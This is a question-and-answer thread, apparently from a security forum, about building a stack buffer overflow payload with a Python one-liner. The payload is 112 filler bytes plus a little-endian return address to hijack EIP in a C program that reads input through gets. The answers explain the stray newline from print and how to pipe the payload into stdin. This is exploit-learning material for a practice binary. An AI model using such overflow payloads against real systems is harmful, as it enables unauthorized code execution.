
I'm trying to provoke a buffer overflow in order to execute a function in C code. So far I have already managed to find out the number of bytes needed to take over the EBP register. The only thing left is to substitute the address in EIP with that of the function I wish to execute. I'm trying to generate this payload with python. For this I use the following

python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload

This is what I get

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�

Notice those last characters! I know that it's not what I was supposed to get. The address I wish to run on the EIP register is 0804863b. I had to put this in little endian for the exploit to run properly. Any comments on this? I'm not able to go further with the exploit because of this...

fish202
  • If you remove the `> attack_payload` is EIP successfully overwritten with your requested address? – DKNUCKLES Oct 08 '17 at 18:39
  • @DKNUCKLES not sure how I would do that, without copying the file's content, because the code is expecting some input (string) to feed `gets` function. – fish202 Oct 08 '17 at 21:14

1 Answer


I have no idea how you looked at your attack_payload file. But you should not just dump it to the terminal or look at it within some editor - since in this case the data will be interpreted as characters. Instead you should do some hexdump of the file, for example with xxd:

$ python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload
$ xxd attack_payload 
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
...
00000060: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000070: 3b86 0408 0a                             ;....

As you can see in the last line, the bytes \x3b\x86\x04\x08 are actually mostly where you expected these. You probably did not expect the newline character \x0a (i.e. \n) at the end of the file but that's what a print in python adds. If you don't want this don't use print but:

$ python -c 'import sys; sys.stdout.write("A"*112 + "\x3b\x86\x04\x08")'  > attack_payload
Steffen Ullrich
  • I just cat the file and copied those chars into stdin (because a gets function is asking for a string in the program). I've seen this procedure in some tutorials. As an example, the output should look like this `A(...)A<84>^D^H` when that command is executed. But what you're saying makes sense to me... Given that, are there any ways to deliver this payload to the `gets` function and overflow the buffer? – fish202 Oct 08 '17 at 20:50
  • @fish202: if the application reads with gets from stdin just `app < attack_payload` or `python -c '.... ' | app`. But that's not really a security question but instead just how to feed data to applications stdin. – Steffen Ullrich Oct 08 '17 at 22:17
  • Sure, but I can't feed it directly like that. Please follow the [link](https://pastebin.com/tv7zyvF0) to the code. – fish202 Oct 08 '17 at 22:36
  • @fish202: I would suggest that the problem is that the `gets` in `stringLength` only gets called if the correct option was selected - and your attack sequence does not account for selecting the option. Anyway, I've shown you what the problem is with creating the payload you want. Debugging your code and showing that the payload you wanted is wrong in the first place is outside of this question. – Steffen Ullrich Oct 09 '17 at 04:52